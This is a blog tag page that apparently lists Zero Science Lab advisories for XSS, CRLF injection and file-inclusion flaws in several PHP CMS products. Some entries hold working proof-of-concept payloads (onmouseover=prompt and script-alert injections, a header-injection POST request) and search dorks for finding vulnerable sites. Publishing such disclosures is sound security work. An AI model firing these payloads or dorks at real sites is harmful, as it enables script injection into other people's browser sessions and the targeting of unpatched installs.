Posts Tagged ‘ CMS

Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5090
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php

PoC:

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post "onmouseover=prompt(1) joxy
adresse_destinataire
adresse_expediteur lab%40zeroscience.mk
asciiart_post "onmouseover=prompt(2) joxy
expediteur "onmouseover=prompt(3) joxy
message Hello%20World
message1 %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send Send
titre_sav "onmouseover=prompt(4) joxy
url_sav http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561 "onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920 2

Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities

Baby Gekko CMS suffers from multiple stored (post-auth) XSS vulnerabilities and path disclosure issues when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session or disclose the full installation path of the affected CMS.

——————————————————————————–

Reflected (Non-Persistent) XSS:

1. username
2. password
3. verification_code
4. email_address
5. password_verify
6. firstname
7. lastname

Stored (Persistent) XSS:

8. groupname
9. virtual_filename
10. branch
11. contact_person
12. street
13. city
14. province
15. postal
16. country
17. tollfree
18. phone
19. fax
20. mobile
21. title
22. meta_key
23. meta_description

——————————————————————————–

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php
Vendor: http://www.babygekko.com/site/news/general/baby-gekko-v1-2-0-released-with-3rd-party-independent-security-testing-performed-by-zero-science-lab.html

Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities

Anchor CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Dork: “intext:Powered by Anchor, version 0.6

Advisory ID: ZSL-2012-5085
Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5085.php

BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities

BGS CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method (post-auth). Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Dork: footer: “powered by BGS CMS”

Advisory ID: ZSL-2012-5084
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php

Fork CMS 3.2.7 Multiple HTML Code Injection Vulnerabilities

Fork CMS suffers from multiple XSS vulnerabilities when parsing user input to several parameters in different scripts, via POST and GET methods. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5076
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5076.php

Limny 3.0.1 (login.php) Remote URI Based Cross-Site Scripting Vulnerability

Limny suffers from a XSS issue in ‘/admin/login.php’ that uses the ‘PHP_SELF’ variable. The vulnerability is present because there isn’t any filtering to the mentioned variable in the affected script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

——————————————————————————–

/admin/login.php
----------------
100: <form name="limny_login" action="<?php print $_SERVER['PHP_SELF']; ?>" method="post">

——————————————————————————–

Advisory: ZSL-2012-5066

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5066.php

Hero Framework 3.69 Remote Reflected Cross-Site Scripting Vulnerability

Hero suffers from a XSS vulnerability when parsing user input to the ‘month’ parameter via GET method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

PoC:

http://localhost/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

http://localhost/hero_os/events?month=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5061.php

Manx cms.xml Multiple Vulnerabilities

(XSS) Input thru the GET parameters ‘limit’ and ‘search_folder’ in ‘ajax_get_file_listing.php’ are not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.

(CRLF Injection/HTTP Response Splitting) Input passed to the POST parameter ‘editorChoice’ in ‘admin_blocks.php’ and ‘admin_pages.php’ and the POST parameter ‘theme’ in ‘admin_css.php’, ‘admin_js.php’ and ‘admin_templates.php’ is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

(LFI/DT) Input passed via the ‘fileName’ parameter thru the simplexml_load_file() function is not properly verified in ‘/admin/admin_blocks.php’ and ‘/admin/admin_pages.php’ (post-auth) before being used to load files. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks.

Advisories:
ZSL-2011-5058http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5058.php
ZSL-2011-5059http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5059.php
ZSL-2011-5060http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5060.php

:):

Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability

The CMS suffers from multiple XSS vulnerabilities. Input thru the POST parameters ‘SITE_NAME’ (stored), ‘return’ (reflected) and the GET parameter ‘search’ (reflected) thru Hotaru.php, are not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5057.php

11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability

Input passed to the ‘content’ parameter in ‘do.php’ on line 2112 is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

—————-
POST /11in1/admin/do.php?action=postStatus HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection

HTTP/1.1 302 Found
Date: Sun, 06 Nov 2011 18:53:29 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: msg.php?connect=yes&status=
ZSL-Custom-Header: love_injection
Content-Length: 1716
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php